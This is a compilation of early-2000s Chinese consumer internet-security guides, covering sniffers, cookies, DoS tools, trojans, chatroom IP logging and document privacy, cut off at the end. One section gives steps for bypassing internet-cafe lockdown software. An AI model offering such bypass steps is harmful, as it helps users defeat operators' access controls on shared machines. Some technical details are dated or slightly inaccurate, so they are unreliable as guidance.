注意：建议先备份注册表，然后搜索内存和注册表，清除间谍软件注册信息!如有不测，可恢复！


防范网络监听

防范网络监听

通常sniffer所要关心的内容可以分成这样几类：

1、口令：sniffer可以记录到明文传送的userid和passwd.就算你在网络传送过程中使用了加密的数据，sniffer记录的数据一样有可能算出你的算法。

2、一些帐号：sniffer可以很轻松截获在网上传送的用户姓名、口令、信用卡号码、截止日期、帐号和pin。

3、偷窥机密或敏感的信息数据:　　通过拦截数据包，入侵者可以很方便记录别人之间敏感的信息传送，或者乾脆拦截整个的email会话过程。

防止被sniffer的办法:

1.检测和消灭嗅探器
2.会话加密
3.将数据隐藏，使嗅探器无法发现

对于一般用户唯一能做的就是加密，你最关心的可能是传输一些比较敏感的数据，如用户ID或口令或内容等等。有些数据是没有经过处理的，一旦被sniffer，就能获得这些信息。解决这些问题的办法是加密。目前有许多软件包可用于加密连接，从而即使捕获到数据，但无法将数据解密而失去窃听的意义。


防范网络追踪

防范网络追踪

浏览网页不仅能泄露个人信息，也有被硬盘共享的可能！很多网站都通过网页收集信息，其主要方法有两个，一个是不安全的Cookie，另一个是网络爬虫（Web Bugs）。

有些网站设有cookie功能，当我们浏览该网页时，该网页便会夹带一个cookie给我们，我们的电脑便会把这东西存在自己的硬盘中。下次你再进入同样的网页时，这个cookie也顺便回传给该站。一些别有用心者设计的Cookie却非常不安全，它会告诉该网站用户访问了哪些网站、点击过哪些广告、甚至是在网上输入其他信息!如有可能，它还会收集你的邮件地址、电话号码等等。我们通过浏览器的选项设置来手工接收或拒绝Cookie!

网络爬虫（Web Bugs），它只是网页上的一个图片，它植入网页或以HTML编写的电子邮件里，当用户浏览网页时，Web bugs自动把个人信息传给远端服务器！当然，Web Bugs所能做的可能还不止这些，关键是这个小图片一般都极小，很难发现，所以Web Bugs的危害比Cookie还要大。

对付不安全Cookie和Web Bugs，IDcide公司专门制作了一款小软件IDcide Privacy Companion，下面介绍该软件详细使用方法。

1．下载和安装: 我们可以到软件的提供网站下载，软件大小为1.32M，免费软件。

2．使用方法：这是一款浏览器的插件，启动IE之后，会在IE标题栏右侧提供三个按钮，左面的是网页监视情况，中间的是网站跟踪情况，右面的是安全级别和下拉菜单。

当我们上网时，如果IDcide Privacy Companion发现网页有监视我们的Cookie或者Web Bug，左面的图标就会变成一眨一眨的大眼睛，如果发现有站点的Cookie在跟踪我们，中间的图标就会就成三只眼睛。

软件发现我们一旦被监视，会自动将其中止，眼睛就会被打上一个“X”号。 点击左侧或中间的图标，软件会把详细情况以列表的形式告诉我们。在“Sites”页内，告诉我们网页中有哪些内容企图监视我们的行踪，在“Tracking Networks”中告诉我们哪些站点企图跟踪我们。

3．设置：该软件提供了高级防护、基本防护和不防护三个级别，我们可以点击右面的图标从下拉菜单中选择：其中“High Privacy”为高级防护，在这种级别下,发现不安全的行为将自动中止；“Medium Privacy”为基本防护，它能警告我们网页的不安全；“No Privacy”为不防护，这是为了防止在保护模式下某些网站无法访问。点击下拉菜单中的“Settings”，能够对默认的防护级别和每个防护级别的防护内容进行设置。默认防护级别可以设置为高、基本、不防护和上次设定的级别，安全防护内容可以设置为防止网络追踪和站点监视，我们可以根据自己的需要来设置。如果某些网站在屏蔽了Cookies就不能访问时,那就暂时把它“Disable”。

4．下载：(privacy_companion.exe 1.31MB)
Windows 9x, NT 4.0, and 2000 with Internet Explorer 4.01 - 5.01.
http://www.idcide.com/pages/per_auto1.htm
http://www.idcide.com/pages/per_auto2.htm
http://www.idcide.com/pages/idcide_b1041_bld94.exe (1.32MB Beta version for IE 5.5 )

另外，我们在上网也应注意，不向网站和外届泄露自己真实情况，不把重要信息存放在微机中，定期清除历史记录和Cookie等等!


个人上网用户自我防护手册

个人上网用户自我防护手册

SafeBook V1.0 for Windows 95/98 by 孤独剑客 janker@371.net http://janker.126.com （本文及相关程序将不定期更新）

一、写在前面的话

Internet网在我国是从1996年开始进入迅猛发展时期的，随着网络神话的不断诞生，更多的年轻人加入到这个令人神往的行业中来，俗话说的好：“林子大了，什么鸟都有”，网络也一样，良莠不齐，在绝大多数网络人员为祖国的信息产业献策献力的时候，少数人却为展示自己或获得某种利益而实施网络攻击，最终落得身陷囹圄甚至命绝黄泉的下场，实在可悲可叹。但由于网络的特殊魅力，网络攻击者可谓是前仆后继，一浪高过一浪。因此，当大家在与网络接触的过程中往往会遭到一些不明的侵袭，比如：聊天室里你的屏幕上突然被打开了无数的窗口、使用OICQ时一下子收到了大量的垃圾信息、使用从某网站下载的软件后你发现机器处理速度明显变慢了、当你浏览某网站的时候突然机器蓝屏死机了、到电信局交网费的时候你发现拿到的是近乎天文数字的帐单，如此种种，都表明你受到了网上的非法侵害。其实我自从不断地收到网友的求助以来，已经有一些时日了，早就有写一篇关于网络自我防护方面文章的想法，但由于工作和生活等原因，一直没能静下心来写一写，现在大家的呼声越来越高，最终决定仓促提笔，把自己的心得体会用通俗易懂的语言写上一写，作为第一版，献给大家！但由于本人的经历和水平有限，肯定会有很多不当之处，敬请批评指正。

二、了解一点网络小常识

1、什么是IP地址？

我们上网的每台机器都至少会有一个IP地址，以区别与Internet网上的其他机器，格式为: xxx.xxx.xxx.xxx （其中x代表0-9的数字，xxx的大小在0到255之间）比如：一般机器的本地IP地址是127.0.0.1。其实IP地址相当于你在Internet上的身份证号码，是用于区别他人的，所以在Internet里是没有两个IP地址是相同的。

2、拨号用户的IP地址是每次都变化的

对于拨号上网的用户，你每次拨号上网被分配的IP地址是变化的。比如：这次你的IP地址是202.102.243.48，下次可能是202.102.243.170或其他，但在整个Internet里仍然是唯一的，并且在你没有挂断之前一直是不变的。不少拨号上网的网友对IP地址每次都变化表示困惑，我是这样理解的：假如你的ISP（网络服务提供商）有1000个拨号用户，而它只拥有500个IP，事实上经你的ISP统计，一般同时上网的用户不超过400人，所以给它的拨号用户随机从500个IP中分配不仅是可行的，而且是划算的。当然你若肯向你的ISP额外付费的话，完全可以获得一个拨号的固定IP，但这对大多数拨号用户来说是不必要的开支。

3、每个网卡至少可以绑定一个IP地址

大多数时候，分配给网卡的IP地址是固定的，事实上一个网卡可以同时绑定多个IP地址，网卡主要用在两种环境：一种是绑定一个外部IP地址直接接入Internet网，一般用于Internet服务器或专线用户上网；另一种是绑定一个内部IP地址和其他机器连接成一个局域网，当然若局域网服务器设置有DHCP服务器的话，也可以给局域网内部的每台工作站分配动态的内部IP地址。若有Proxy代理服务器的话，还可以访问外部Internet网，事实上不少企业和网吧都是通过代理服务器实现内部机器上网的，这样不仅节省了IP，而且安全性更好些。

4、我上网后怎么才能知道我的IP地址？

对于Windows 95: 运行 winipcfg.exe

对于Windows 98: 运行 ipconfig.exe

注：文件winipcfg.exe和ipconfig.exe在你的Windows目录里。

5、Port端口有什么用处？

Port端口是用来标识不同Intenet服务的。打个比方：某公司的总机电话是88888888，电脑部的分机电话是001，网络部的分机电话是002，依次类推。那么我要找该公司电脑部的人，首先要知道公司总机电话88888888，而且还要知道001才能接通，同样要找网络部的话就要知道002... 这里的8888888就相当于IP地址，001和002就相当于端口，是用来区分同一公司的不同服务部门的，也就是说我知道了某台服务器的IP地址，并向它提供端口号，它才能把你需要的数据传送给你，当然那个端口必须是开放的，就好比公司的电脑部必须是存在的一样。一般我们的浏览器默认是向IP地址为80的端口发送请求的。常见的端口号及相应的服务如下:

21 FTP-文件传送 （用CuteFtp等Ftp软件维护网站用的就是该协议）

23 TELNET - 远程登录 （管理员和黑客远程控制系统的最基本手段）

25 SMTP - 邮件发送 （Outlook Express或FoxMail等邮件程序发Email用）

53 DNS - 域名解析 （实现域名和IP地址之间的转换）

80 HTTP - Web服务 （最常用的为Internet Explorer等浏览器提供网页服务）

110 POP3 - 邮件接收 （Outlook Express或FoxMail等邮件程序收Email用）

...

注：端口范围为0-65535， 0-1024为系统使用，剩下的用户自己定义，所以聊天软件和木马等使用的端口大多都大于1024。

6、我知道对方的IP地址，如何判断对方是否在网上？

用Ping.exe程序，方法如下：

Ping 对方的IP地址（回车）

若出现信息 “Reply from ...” 说明对方在网上！

若出现信息 “Request timeout ...” 说明对方不在网上！

注：文件Ping.exe在Windows目录里。

7、什么是Proxy代理服务？

代理服务其实很简单，就好比代理人，你只需把你的要求告诉他，他就会为你把事情办好。当然若他不认识你又不愿意学雷峰的话，你可能要付一定的费用，不过若你能够使他认为你是他的亲戚的话，也许他很乐意免费为你服务。而Internet网上的代理说白了就是一个IP地址和特定端口，比如：你在一个局域网里，你的内部IP地址是192.168.0.1，代理服务器的内部IP地址是192.168.0.100和外部地址是202.102.248.78，本来你是无法访问 http://janker.126.com的，但202.102.248.78能够访问，并且它只能和内部地址192.168.0.100相互交流（在同一主机里呀），那么你就可以把你的请求通过192.168.0.100告诉给202.102.248.78，由202.102.248.78向http://janker.126.com递交请求，http://janker.126.com会把请求结果反馈给202.102.248.78，然后202.102.248.78再通过192.168.0.100把结果给你就完了！对于Internet Explorer设置代理服务器的方法如下：

IE菜单“工具”->“Internet选项”->“连接”->“局域网设置”->“代理服务器”

填入代理服务器的“地址”和“端口”即可。至于如何找到代理服务器，其实网上有很多免费的，用国产的一个叫Proxy Hunter软件的就可以找到很多！

可以看出，使用代理服务器至少有两个好处：一是你不能访问的资源现在可以访问了；二是你没有和你要访问的服务器打交道，那个服务器自然就无法知道你的IP地址，它只能知道你的代理服务器的IP地址，而你的代理服务器可能与你一点关系都没有。

注：代理服务器的外部地址可以是固定的（网卡绑定专线上网）、也可以是动态的（拨号上网或ISDN等）。

8、什么是TCP和UDP协议？

TCP是面向连接的传送协议，就是说你首先要把你的IP地址和请求信息发送给对方，对方同意后也会把它的IP地址和许可信息发送给你，你收到对方的许可信息后，还要告诉对方：“我也准备好了！”，然后就可以和对方进行数据传送了。其中建立连接的过程一般叫“三次握手”。因为过程烦琐，所以速度慢些，但可靠性高。数据结构如下：

[IP头]+[TCP头]+[数据]

注：

（1）IP头里包括发送方和接收方的IP地址和使用的协议类型

（2）TCP头里包括发送方和接收方的端口

UDP是无连接的传送协议，就是说你不用握手，也不用知道对方是否在网上，只要知道对方的IP地址，发过去就是了，若对方在网上就可能收到了，否则根本收不到。但由于过程简单，所以速度快，当然可靠性就低了。

[IP头]+[UDP头]+[数据]

注：IP头里包括发送方和接收方的IP地址和端口

（1）IP头里包括发送方和接收方的IP地址和使用的协议类型

（2）UDP头里包括发送方和接收方的端口

举例：

HTTP、FTP和mIRC等用的都是TCP协议。

DNS和OICQ等用的是UDP协议。

9、如何才能隐藏上网的IP地址？

对于这个问题，我个人认为：基本上是不可能的。为什么说是基本上呢？是因为有的时候是可以的、是相对的。具体实现IP隐藏的方法主要有两种：

（1）使用代理服务器

从上面可以知道使用代理服务器就能实现对其他服务器的IP地址隐藏，但是你对代理服务器是无法隐藏的。

（2）发送数据时改掉IP数据包里的你的IP地址

说到底，在Internet网上传输的所有数据（包含有你的IP地址），都是以IP数据包的形式传送的，所以可以在发送IP数据包之前先把自己的IP地址改掉，然后再发送，自然对方就无法获得你的IP地址了，相当于实现了IP地址隐藏。但问题是，你若使用的是TCP协议的话，对方即便许可了也无法把许可信息发送给你，而是发送到了你改掉的IP地址那里去了，结果你和对方无法建立连接，当然也就无法从对方获得数据，基本上没什么意义，但是对于有些探测是可行的，比如端口扫描器。当然对于UDP就很有效果了，不少网络炸弹就是用UDP实现IP地址隐藏的。

事实上，现在的Windows平台的网络炸弹大多是没有实现IP地址隐藏的。原因是在Windwos 95/98/NT上的Winsock库不支持对IP头的修改和自定义，在Windows2000和Unix/Linux才允许。当然，完全可以通过自己写一套底层的Socket库来实现，但这样并不容易，更多的是通过写Vxd/Sys等设备驱动程序来实现的，当然对一般编程人员而言，也有一定难度。

所以，总结一下就是：在网络上隐藏IP地址基本上是不可能的。

三、构建一个安全的操作系统

在这里说是构建一个安全的操作系统，更确切的应该是说保证操作系统的网络功能安全，因为无论是Windows 95还是Windows 98的网络功能都存在安全漏洞，可以导致远程的D.O.S（拒绝服务）攻击，而出现TCP/IP栈崩溃、Modem掉线、系统凝固、蓝屏错误和系统重新启动等现象。

1、常见D.O.S攻击软件介绍

（1）WinNuke: 通过发送OOB漏洞导致系统蓝屏，是最早的Windows 95攻击器。

（2）Bonk: 通过发送大量伪造的UDP数据包导致系统重启动。

（3）TearDrop: 通过发送重叠的IP碎片导致系统的TCP/IP栈崩溃。

（4）WinArp: 通过发特殊数据包在对方机器上产生大量的窗口。

（5）Land：通过发送大量伪造源IP的基于SYN的TCP请求导致系统重启动。

（6）FluShot: 通过发送特定IP包导致系统凝固。

（7）Bloop: 通过发送大量的ICMP数据包导致系统变慢甚至凝固。

（8）PIMP：通过IGMP漏洞导致系统蓝屏甚至重新启动。

（9）Jolt: 通过大量伪造的ICMP和UDP导致系统变的非常慢甚至重新启动。

等等... 还有以上程序的诸多变种！不再一一叙述。

2、安装网络安全补丁程序

[Windows 95]

步骤如下：

（1）下载并安装MS Winsock Update - wsockupd.exe（188K）

（2）下载并安装MS DUN 1.2 Upgrade - msdun12.exe（1.38M）

（3）下载并安装Winsock 2.2 Upgrade - ws2setup.exe（963K）

（4）下载并安装“端口攻击拦截器” - nn21.exe（602K）

注：以上安装顺序不能颠倒，（1）-（3）安装完毕后都要重新启动系统。

[Windows 98第一版]

（1）下载并安装IGMP Patch - 3304up98.exe （176K）

注：安装完毕后要重新启动系统。

[Windows 98SE第二版]

（1）下载并安装IGMP Patch - 3304upse.exe （178K）

注：安装完毕后要重新启动系统。

3、关掉不必要的服务（端口）

（1）下载PortScanner（26K）并运行，检查你的系统开放的端口，IP地址127.0.0.1。

（2）检查你有没有使用常见的HTTP和FTP服务，若有的话上网时最好关掉。因为每一个服务软件都会遭到很多种攻击，对于一般用户是比较难以防范的。

（3）关掉最容受攻击的139端口：运行RegEdit.exe 查找串“vnetbios”,找到后再选择“查找下一个”，将找到象“blahblah\VxD\VNETBIOS\”的串，删除“VNETBIOS”项即可。

注：以上操作一定要谨慎，误操作可能导致系统崩溃，另关掉139端口后将无法共享文件和打印功能。

4、使用病毒和木马查杀工具对系统扫描

我个人推荐使用Norton AntiVirus 2000，不仅杀除病毒和木马程序的效果好，支持动态检测而且免费，更有在线升级支持，网站地址为 http://www.symantec.com，下载并安装后对系统进行一次全面的查杀即可。

5、使用防火墙软件实现在线安全防护

一般来说，经过以上处理以后，系统已经是相当安全的了，但若为更加安全起见，不妨安装防火墙软件，当然这是以付出系统资源和降低网速为代价的，更甚者有的免费防火墙软件有后门，所以大家要慎重选择。

一般用户可选用：

国产免费的“天网” http://sky.net.cn/ for windows 9x/nt/2000

国产免费的“绿色警戒” http://www.nsfoucs.com/ for windows nt/2000

专业用户选用：

国外共享的“LockDown2000”产品 http://lockdown2000.com/

说明：目前用于个人的防火墙软件大多只是在底层实现包过滤功能，对于D.O.S拒绝服务类的攻击比较有效，但对于应用层的攻击基本上是无能为力的，比如: ICQ和OICQ消息攻击器，就能穿透大多数的防火墙软件。

四、网络攻击的分类与防范

对个人用户的网络攻击按照攻击效果分大致D.O.S拒绝服务和系统入侵两种。攻击者要实施攻击就必须知道对方的IP地址。所以很好的保护自己的IP地址是非常重要的，至于端口，攻击者知道你的IP地址后用端口扫描软件很容易获得你开放的端口列表。

1、D.O.S拒绝服务攻击

该攻击的方法往往是利用操作系统网络功能的漏洞而进行的。比如: Windows 95/NT的OOB漏洞，Windows 98的IGMP漏洞等，造成的现象为TCP/IP栈崩溃导致与Internet的连接中断、系统蓝屏、系统凝固甚至重新启动、有无数的窗口被打开等等。但基本上对硬盘上的数据没有损害，一般重新启动机器即可恢复。

防范方法为：安装系统补丁程序和使用放火墙软件。

2、系统入侵攻击

由于大多数的Windows 95/98不提供如HTTP、FTP、TELNET等服务器才提供的服务，所以通过这些实现入侵一般是行不通的，但有的用户可能会使用HTTP服务器设计网页或使用FTP服务器让朋友从自己机器上下载文件或调试程序，这就给攻击者造成了可乘之机，所以也必须多加注意，若你对自己开的这些服务的安全性没有把握的话，上网时建议最好关掉。事实上，对于Windows 95/98系统的入侵大多数是通过下面的方式进行的。

（1）通过139端口的共享功能

Windows 95/98的139主要是用于文件和打印机共享的，所以往往开放，这使得攻击者知道你的IP后只要使用Legion、SharesFinder、Smbscanner等共享搜索软件很容易把你的C:盘映射成他的H:盘等，然后就可以读写你C:盘的文件了，是非常危险的。

防范方法：删除文件或打印机共享功能（控制面板->网络->打开->删除列表中的“Microsoft网络的文件和打印机共享”项）或用前面的方法彻底关掉139端口。

（2）木马程序实现全系统控制

当前使用木马程序实现对远程机器的全部控制是非常流行的，主要因为通过该方法的入侵的好处是隐蔽性强和控制能力强。事实上，木马入侵是有条件的，大多用来入侵那些对网络不太熟悉的一般用户，一旦入侵就会造成比较严重的后果。一般木马入侵步骤为：

A、在你的机器上安装木马的Server程序

木马的Server一般会隐藏在下面的程序中：

<>Email里得到的说是如何如何好的程序

<>从非专业网站站点下载的程序中

<>从朋友处得到的据说有多么多么好的程序

<>通过ICQ等实时聊天软件传送过来的程序

<>...

防范方法：在运行任何程序前都用最新的病毒和木马查杀软件扫描。

B、取得你的IP地址

基本上，一旦取得你的IP地址的话，攻击者就已经可以完全控制你的机器系统了，也就是说相当危险了，所以保护自己的IP地址是很重要的。事实上，即便你的机器上被安装了木马程序，若没有你的IP地址，攻击者也是没有办法的，但可恶的是有些木马的Server程序会把你每次上网的IP地址自动发送到指定的ICQ或指定Email信箱里，以致于防不胜防，所以关键在于切断木马入侵的第一步。

防范方法：不运行来历不明的程序，并且定期用最新的病毒和木马查杀软件对系统进行扫描或专业用户用防火墙软件禁止掉你不用的端口。

常见木马程序：BO2000、SubSeven、NetBus、国产冰河等。

五、保护自己的网上资源

上网用户基本上在网络上都有自己的网络资源，比如：Email、BBS帐号、个人主页空间等，我们这些资源的安全其实主要取决于服务商的系统和程序的安全。我们能掌握的主要是帐号和密码。那么在这被动的情况下如何才能更好地保护好自己的资源保护呢，我想主要是从以下几个方面考虑：

1、选择名气大和名声好的服务商申请我们需要的资源，因为这样的服务商大多有资金去保证系统的稳定性和安全性。

2、把自己的密码设置安全，我个人认为比较安全的密码应该是：不少于8位的字母大小写和数字混合，比如：A1b2C3d4，否则很难抵御一些网页破解软件如：WWWHACK、WEBHACK等的暴力破解。一定不要用生日、电话等公开信息做密码。

3、在网吧等公共上网场所，当你下机时要把自己留下的信息清除掉，比如，你的OICQ号码为888888，那么下机后最好把C:\Program File\Oicq\888888目录删除，否则你就有OICQ密码被破解和聊天记录被偷看的危险，当然，你一定要确保把“垃圾站”清空，否则很容易被还原出来。

六、网上畅游需要注意的问题

1、浏览网站

一般来说浏览网站是不会有太大危险的，因为大凡网站都是想吸引人的，所以越是名气大、浏览量高的网站一般安全性越好！也许有朋友会问浏览网站的危险性有多大？这基本上可以明确，轻的可以使系统死机，重的可以格式化硬盘，当前通过网页进行的欺骗和攻击的常见手法有：

（1）通过让你提交表格偷窃你的邮件地址

就是说，你看到某网站提供一些服务，并没说要你填写Email地址，否则你可能就不填写了，可是当你提交时才发现，程序自动调用了你的邮件程序，用你的默认帐号把你填的内容发走了，也许快的你根本来不及阻止，这样好了，以后等着收垃圾信吧。所以最好在你的邮件程序里建立一个假的Email帐号并设置为默认帐号。

（2）通过模拟登录界面偷窃你的邮件帐号和密码

这种手法被用的太多了，就是在自己网页上模拟你的邮件服务商的登录界面，让你输入你的帐号和密码，你填入并提交后的确进入到了你的服务商提供的操作界面里，但殊不知你的帐号和密码已经被截获了，所以建议从Web登录信箱时一定要从你的服务商提供的界面登录。

（2）通过网页偷窃走你的硬盘上的文件

其实是通过一个CGI程序和浏览器的漏洞实现的，让你浏览某网页的时候，该CGI程序会读出你计算机里指定的文件内容并处理（比如发送到某指定信箱）。

（3）使用JavaScript/VbScript/Java炸弹

不说了，非常简单，除非你在浏览器里禁止这些脚本的运行，否则几乎没有办法。设置方法为：Internet Explorer->工具->Internet选项->高级，然后根据需要自己选择吧。

（4）通过网页下载某类文件并执行该文件里的脚本程序

当你浏览某设置好的网页时，浏览器会自动下载某类文件，然后执行文件里的脚本，也就是说可以执行你计算机上的程序，比如:Format.com！所以建议最好还是把硬盘上的format.com文件改名，比如改为fmt.com，甚至del掉，format.com文件一般在你的windows\command目录中。

（5）通过网页里的脚本执行硬盘上的程序

意思很明显了，就是可以直接执行你计算机上的程序，比上面的方法速度更快，但容易暴露，一看源文件就知道了，但可怕的是，没等你来的及看，它已经执行开始甚至完成了。一般此类网页都需要JavaScript支持，所以若禁止JavaScript的话就没危险了，但问题是禁止了JavaScript的话，就不能正常浏览大多数使用JavaScript的网站了！

2、Web聊天室

我想在网上没有比在聊天室里的问题更多的了，尤其是踢人问题。并且大家所在的大多为Web聊天室，何为Web聊天室呢？其实就是不用客户端软件直接用浏览器就可以进行交流的聊天室，当然Java聊天室其实属于客户端，不在这之列。在这里我只想讨论一下在聊天室里保护自己的IP地址的问题。实际上在聊天室里能不能保护自己的IP地址，并不是我们所能够控制的，主要是聊天室程序的问题，若聊天室发言支持HTML的话，那么基本上JavaScript炸弹基本上可以在这个聊天室满天飞了，事实上大多数聊天室的发言并不支持HTML，但却支持发任意地址的图片和音乐，这恰恰是一个漏洞，假如我在自己的机器上安装一个HTTP服务器，我的IP地址为202.108.123.44，那么我把http://202.108.123.44/dog.gif发给对方，对方的浏览器就会向我的HTTP服务器请求dog.gif文件，结果我的HTTP服务器就把对方的IP地址记录了下来，若我向全聊天室的人发送，大家都来请求，结果我会得到所有人的IP地址，这也正是我写的在Web聊天室里抓IP的小工具-IP Hunter的原理，非常简单，所以比较安全的Web聊天室就是发言只支持纯文本的聊天室，当然这种安全是以失去动态页面为代价的。其实在Web聊天室里比较安全的保护自己IP的方法是使用代理服务器，关于如何设置代理服务器请参考前面的讲述。

3、OICQ聊天软件

现在国内很多人在使用该软件，然而由于该软件设计上的原因，注重了数据的传送效率，对于安全性考虑的相对少一些，所以使用的是UDP协议，给攻击者造成了漏洞，以至于对熟悉UDP编程的人只用很短的代码就可以编制出消息攻击器来。由于消息攻击器发出的数据和正常的数据除了短时间发送的次数多以外，几乎没什么区别，所以基本上连防火墙软件也无能为力。临时的解决办法是不要让你不熟悉的人成为你的好友，当然你也不要暴露你的好友的OICQ号码给陌生人，对于来自陌生人的消息攻击，就是一下子有好多陌生人出现，只需要退出OICQ再重新登录就可以消除，若真是出现了来自某个“好友”的消息攻击，也不用去一直点消息框，直接把你的这个“好友”Del掉就可以了！

七、最后要说的话

其实关于如何做好上网自我保护，远不是这么一篇文章能够说明的。本文只是针对上网的普通用户，用通俗的话向大家介绍了一些网络基本常识、如何安全自己的操作系统和常见的攻击方法及防范以及网络冲浪需要注意的事项等。希望对广大网友能够有所帮助，由于工作原因写的比较仓促，一定会有不少问题存在，敬请批评指正，以便在下一版中更正。若您是高手的话，我们可以在深层次的进行探讨，我将非常欢迎。

八、特别声明

本文全部为本人自己撰写并进行程序测试，确保没有任何问题发生，特面向广大网友免费发放，但作者对使用本文的方法及程序而造成的所有后果不承担任何责任，并且为了您的安全请一定要从本站下载本文所用到的程序。若要把本文用于商业目的，请和本人联系，否则本人将有权追究其法律责任并通过必要的手段予以阻止。若要转载，务必要说明出处，以便大家得到最新的版本。

孤独剑客 2000.08.23


关于突破网吧对操作系统屏蔽的几点经验总结

关于突破网吧对操作系统屏蔽的几点经验总结

如果网吧的计算机安装了某种系统管理软件，使资源管理器被屏蔽、鼠标右键被隐藏、禁止下载文件、禁止删除硬盘上的文件，一定会给我们的上网操作带来很多的不方便，以下是我总结出的几点突破封锁的技巧与经验：

一、突破资源管理器被屏蔽的几种方法：
    1.打开Internet Explorer浏览器，点击菜单〈查看〉=>〈浏览栏〉=>〈文件夹〉，就可以打开被屏蔽的资源管理器。
    2.在Internet Explorer浏览器的地址栏直接填入“桌面”或“我的文档”，同样可以打开被屏蔽的资源管理器。
    3.在网络上随意找一个可下载的文件，比如一个几百k的小软件，在下载的过程中把“下载完毕后关闭对话框”前面的对号点击消失，下载完成后点击打开文件夹，资源管理器就出现了。

二、突破禁止下载文件的几种方法：
    1.打开Internet Explorer浏览器，点击菜单〈工具〉=>〈Internet选项〉=>〈安全〉=>〈默认级别〉，即可。
    2.在需要下载的链接上单击鼠标右键，选择〈目标另存为〉保存即可。

三、突破禁止删除硬盘上文件的几种方法：
    1.左键单击选中要删除的文件，按键盘上的Delete键，松开按键后迅速按下Enter键。
    2.复制一个无敏感内容的文件到另外一个文件夹中，并改名为欲删除的文件名和扩展名，复制此文件，回到要删除文件的所在文件夹，点击“粘贴”，系统提示：“确认文件替换”，点击“是’。（注：显示文件扩展名的方法：〈查看〉=>〈文件夹选项〉=>〈查看〉，把“隐藏已知文件类型的扩展名”前面的对号点击消失，点击〈应用〉、〈确定〉即可）

四、突破鼠标右键被隐藏的方法：
    左键单击选中要删除的文件，同时按住shift+F10键，即可显示出鼠标在资源管理器中的右键。

五、突破软驱被禁用的方法：
    前面网友介绍过采用usb接口的移动存储工具：朗科的优盘。此外还有捷盘、鲁文的易盘、怡华的搬运工、华旗的爱国者迷你王，可以根据需要选择不同存储空间的型号：32M、64M、128M、256M不等，记得32M的捷盘价格大约在300元左右，8M应该更便宜一些，可以代替软盘。这样外面的网吧都能下载文件了！再大容量的可以采用usb接口的便携式移动硬盘1.6G-30G不等。


关于网络安全的十点说明

1． 安装windows 95/98时，在填写用户名和公司信息时要使用化名与虚拟地址，应使用例如abc、cnn这样的不生僻的名称，或者干脆不填，尽量不要用中文名。如果已使用真实姓名和地址，可用“超级兔子魔法设置”这样的修改系统设置的工具修改之。这里强烈推荐使用“超级兔子魔法设置”，全中文友好界面，在“魔法设置”→“系统” →“使用者资料”中修改。

2． 同样，在安装word等office组件或者其它应用程序时，在输入用户名和地址时也要输入化名和虚拟地址，以利保密。

3． 如果在word中已用真实姓名和公司注册，可在word主界面“工具” →“选项” →“用户信息”一栏修改之；如果只针对某一单个文档，可在“文件” → “属性”→“摘要信息”的“标题”、“主题”、“作者”、“单位”等栏目中清空所有内容然后存盘。特别注意“单位”栏，即使前面在“用户信息”中修改了姓名，但单位仍然存在，必须手工修改清空。“上一次保存者”的问题或者可以用一个不是非常好的办法解决：打开文档，按照3中所说步骤清理用户信息，然后选择“文件” →“另存为”换名存盘，这样“上一次保存者”内容就变成修改后的用户了，最后将原文件彻底删除。或者在清理用户信息后在原文档基础上末尾加几个空格或者回车换行，然后存盘。这里推荐使用windows自带的“记事本”写不超过1K的短文（排版要求不严格），用windows自带的“写字板”写不超过10K的文章（有一定的排版要求），然后存成rtf格式。

4． 注意一定要将word“工具”选项的“常规”页上“列出最近所用文件数”设为空，并将这一项前的对号去掉。Word也提供了文档密码保护功能，在word主界面“工具” →“选项” →“保存”项中可以设打开权限密码和修改权限密码，配合例如“5c7f6b4#”这样的8位以上的字母与数字混合的密码也能起到一定的保密作用。

5． 再详细说一说“超级兔子魔法设置”，这个工具的最新版本是3.4版，是一个免费软件，软件主页是www.superr.net，在国内外各大软件下载基地如华军（www.newhua.com）、海龙王（http://www.hu.zj.cninfo.net/~seadragon/）、tucows等都有可供下载。在yahoo等搜索引擎上以“超级兔子”为关键词搜索也可找到有关介绍和使用说明及下载链接。我在这里简单介绍一下我们常用的功能：一是本文开头提到的修改使用者资料，这里不再重复；二是在“魔法设置”→“开始菜单” →“禁止使用文档菜单”项前打勾选上，这样就不用每次关机前清空文档菜单了，也可在“禁止开始菜单”中把“文档”栏同时选中，这样更安全；三是在“魔法设置”→“清除垃圾”项中清除上网历史记录、下载的网页、cookie、winzip解压记录等等信息，保证我们的网络安全；四是在“魔法设置”→“高级隐藏”项中可以选择隐藏开始菜单的程序项和收藏夹项目，不过这里不推荐使用超级兔子魔法设置隐藏硬盘上文件夹，而推荐下文中介绍的“网盾”加密文件夹，隐藏文件夹可用magic folder、File Protector、MagicPtc（电脑魔法保护1.0、国产软件、在http://greenstuff.363.net上有下载及说明），具体这些软件使用可以参考国内《电脑报》有关文献（www.cpcw.com）。另外在超级兔子魔法设置完全版所带的“注册表扫描和清理工具”似乎可以清理一些注册表中的历史记录项，如acrobat reader中的历史记录项等，这似乎可以解决user.dat等注册表隐藏文件中的历史记录和link项，建议多使用一些注册表清理工具综合清理。还有最好不要在收藏夹中添加限制网站地址，因添加在收藏夹里容易留下痕迹，有经验的学员可以使用互连网上的网上地址收藏夹。最后提醒大家，超级兔子魔法设置的选项中可以设置兔子的密码，大家视情况使用。

6． 网盾软件号称是互联网时代必备的信息安全工具。它主要用于保障机密资料、金融数据、电子邮件和个人隐私等重要信息的存储、访问和传输安全。网盾提供的数字签名和数字信封技术可以确保信息交换中的保密性、完整性、不可否认性和对通信双方的身份认证。网盾也提供了多种手段确保电子邮件的安全。网盾软件目前的最高版本是3.1版，几乎所有联想微机（家用、商用、笔记本电脑）都捆绑了网盾软件，可以在联想“我的办公室”、“幸福之家”、“联想移动办公”等套装软件中单独找到。如果没有联想软件，也可以从http://grwy.online.ha.cn/zhoucctv/soft/ND30_free.zip或者http://netsafe.ayinfo.ha.cn/software/anquan/zonghe/fense.zip下载免费共享版。如果链结有误，请用雅虎等中文搜索引擎搜索。网盾加密软件我们主要使用以下功能：

